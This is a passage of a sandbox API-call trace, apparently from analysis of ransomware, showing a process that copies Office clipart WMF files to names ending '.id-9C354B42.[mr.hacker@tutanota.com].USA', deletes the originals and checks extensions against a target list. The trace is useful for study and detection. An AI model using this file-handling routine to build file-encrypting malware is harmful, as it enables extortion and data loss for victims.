lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.122] SetEndOfFile (hFile=0x2b4) returned 1 [0267.122] CloseHandle (hObject=0x2b4) returned 1 [0267.122] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.122] SetEndOfFile (hFile=0x328) returned 1 [0267.124] CloseHandle (hObject=0x328) returned 1 [0267.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf")) returned 1 [0267.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.124] lstrlenW (lpString=".doc") returned 4 [0267.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.124] lstrlenW (lpString=".docx") returned 5 [0267.124] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.124] lstrlenW (lpString=".pdf") returned 4 [0267.125] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.125] lstrlenW (lpString=".xls") returned 4 [0267.125] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.125] lstrlenW (lpString=".xlsx") returned 5 [0267.125] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.125] lstrlenW (lpString=".ppt") returned 4 [0267.125] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.125] lstrlenW (lpString=".zip") returned 4 [0267.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.125] lstrlenW (lpString=".rar") returned 4 [0267.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.125] lstrlenW (lpString=".bz2") returned 4 [0267.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.125] lstrlenW (lpString=".7z") returned 3 [0267.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.125] lstrlenW (lpString=".dbf") returned 4 [0267.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.125] lstrlenW (lpString=".1cd") returned 4 [0267.125] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.126] lstrlenW (lpString=".jpg") returned 4 [0267.126] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.126] lstrlenW (lpString=".doc") returned 4 [0267.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.126] lstrlenW (lpString=".docx") returned 5 [0267.126] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.126] lstrlenW (lpString=".pdf") returned 4 [0267.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.126] lstrlenW (lpString=".xls") returned 4 [0267.126] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.126] lstrlenW (lpString=".xlsx") returned 5 [0267.126] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.126] lstrlenW (lpString=".ppt") returned 4 [0267.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.126] lstrlenW (lpString=".zip") returned 4 [0267.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.126] lstrlenW (lpString=".rar") returned 4 [0267.127] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.127] lstrlenW (lpString=".bz2") returned 4 [0267.127] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.127] lstrlenW (lpString=".7z") returned 3 [0267.127] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.127] lstrlenW (lpString=".dbf") returned 4 [0267.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.127] lstrlenW (lpString=".1cd") returned 4 [0267.127] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0267.127] lstrlenW (lpString=".jpg") returned 4 [0267.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.127] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.127] lstrlenW (lpString="BS01637_.WMF") returned 12 [0267.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.127] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=3948) returned 1 [0267.127] CloseHandle (hObject=0x328) returned 1 [0267.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf")) returned 0x20 [0267.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.128] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.128] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0267.128] GetLastError () returned 0x0 [0267.128] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xf6c, lpOverlapped=0x0) returned 1 [0267.130] WriteFile (in: hFile=0x2b4, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xf70, lpOverlapped=0x0) returned 1 [0267.131] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.131] WriteFile (in: hFile=0x2b4, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.131] SetEndOfFile (hFile=0x2b4) returned 1 [0267.131] CloseHandle (hObject=0x2b4) returned 1 [0267.131] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.131] SetEndOfFile (hFile=0x328) returned 1 [0267.133] CloseHandle (hObject=0x328) returned 1 [0267.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.133] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf")) returned 1 [0267.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.133] lstrlenW (lpString=".doc") returned 4 [0267.133] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.133] lstrlenW (lpString=".docx") returned 5 [0267.133] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.133] lstrlenW (lpString=".pdf") returned 4 [0267.133] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.133] lstrlenW (lpString=".xls") returned 4 [0267.133] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.133] lstrlenW (lpString=".xlsx") returned 5 [0267.133] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.133] lstrlenW (lpString=".ppt") returned 4 [0267.133] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.134] lstrlenW (lpString=".zip") returned 4 [0267.134] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.134] lstrlenW (lpString=".rar") returned 4 [0267.134] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.134] lstrlenW (lpString=".bz2") returned 4 [0267.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.134] lstrlenW (lpString=".7z") returned 3 [0267.134] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.134] lstrlenW (lpString=".dbf") returned 4 [0267.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.134] lstrlenW (lpString=".1cd") returned 4 [0267.134] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.134] lstrlenW (lpString=".jpg") returned 4 [0267.134] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.134] lstrlenW (lpString=".doc") returned 4 [0267.134] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.134] lstrlenW (lpString=".docx") returned 5 [0267.134] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.134] lstrlenW (lpString=".pdf") returned 4 [0267.134] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.134] lstrlenW (lpString=".xls") returned 4 [0267.134] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.134] lstrlenW (lpString=".xlsx") returned 5 [0267.135] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.135] lstrlenW (lpString=".ppt") returned 4 [0267.135] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.135] lstrlenW (lpString=".zip") returned 4 [0267.135] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.135] lstrlenW (lpString=".rar") returned 4 [0267.135] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.135] lstrlenW (lpString=".bz2") returned 4 [0267.135] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.135] lstrlenW (lpString=".7z") returned 3 [0267.135] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.135] lstrlenW (lpString=".dbf") returned 4 [0267.135] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.135] lstrlenW (lpString=".1cd") returned 4 [0267.135] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0267.135] lstrlenW (lpString=".jpg") returned 4 [0267.135] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.136] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.136] lstrlenW (lpString="BS01638_.WMF") returned 12 [0267.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.136] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=10538) returned 1 [0267.136] CloseHandle (hObject=0x328) returned 1 [0267.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf")) returned 0x20 [0267.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.137] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.137] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0267.137] GetLastError () returned 0x0 [0267.137] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x292a, lpOverlapped=0x0) returned 1 [0267.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x2930, lpOverlapped=0x0) returned 1 [0267.139] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.140] SetEndOfFile (hFile=0x2b4) returned 1 [0267.140] CloseHandle (hObject=0x2b4) returned 1 [0267.140] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.140] SetEndOfFile (hFile=0x328) returned 1 [0267.142] CloseHandle (hObject=0x328) returned 1 [0267.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.142] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf")) returned 1 [0267.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.143] lstrlenW (lpString=".doc") returned 4 [0267.143] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.143] lstrlenW (lpString=".docx") returned 5 [0267.143] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.143] lstrlenW (lpString=".pdf") returned 4 [0267.143] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.143] lstrlenW (lpString=".xls") returned 4 [0267.143] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.143] lstrlenW (lpString=".xlsx") returned 5 [0267.143] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.143] lstrlenW (lpString=".ppt") returned 4 [0267.143] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.143] lstrlenW (lpString=".zip") returned 4 [0267.143] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.143] lstrlenW (lpString=".rar") returned 4 [0267.143] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.143] lstrlenW (lpString=".bz2") returned 4 [0267.143] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.143] lstrlenW (lpString=".7z") returned 3 [0267.143] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.143] lstrlenW (lpString=".dbf") returned 4 [0267.143] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.143] lstrlenW (lpString=".1cd") returned 4 [0267.144] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.144] lstrlenW (lpString=".jpg") returned 4 [0267.144] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.144] lstrlenW (lpString=".doc") returned 4 [0267.144] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.144] lstrlenW (lpString=".docx") returned 5 [0267.144] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.144] lstrlenW (lpString=".pdf") returned 4 [0267.144] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.144] lstrlenW (lpString=".xls") returned 4 [0267.144] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.144] lstrlenW (lpString=".xlsx") returned 5 [0267.144] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.144] lstrlenW (lpString=".ppt") returned 4 [0267.144] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.144] lstrlenW (lpString=".zip") returned 4 [0267.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.144] lstrlenW (lpString=".rar") returned 4 [0267.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.144] lstrlenW (lpString=".bz2") returned 4 [0267.144] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.144] lstrlenW (lpString=".7z") returned 3 [0267.144] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.144] lstrlenW (lpString=".dbf") returned 4 [0267.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.145] lstrlenW (lpString=".1cd") returned 4 [0267.145] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0267.145] lstrlenW (lpString=".jpg") returned 4 [0267.145] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.145] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.145] lstrlenW (lpString="BS01639_.WMF") returned 12 [0267.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.145] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=4236) returned 1 [0267.145] CloseHandle (hObject=0x328) returned 1 [0267.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf")) returned 0x20 [0267.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.146] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.146] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0267.147] GetLastError () returned 0x0 [0267.147] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x108c, lpOverlapped=0x0) returned 1 [0267.148] WriteFile (in: hFile=0x384, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1090, lpOverlapped=0x0) returned 1 [0267.149] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.149] WriteFile (in: hFile=0x384, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.149] SetEndOfFile (hFile=0x384) returned 1 [0267.149] CloseHandle (hObject=0x384) returned 1 [0267.149] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.149] SetEndOfFile (hFile=0x328) returned 1 [0267.151] CloseHandle (hObject=0x328) returned 1 [0267.152] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.152] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 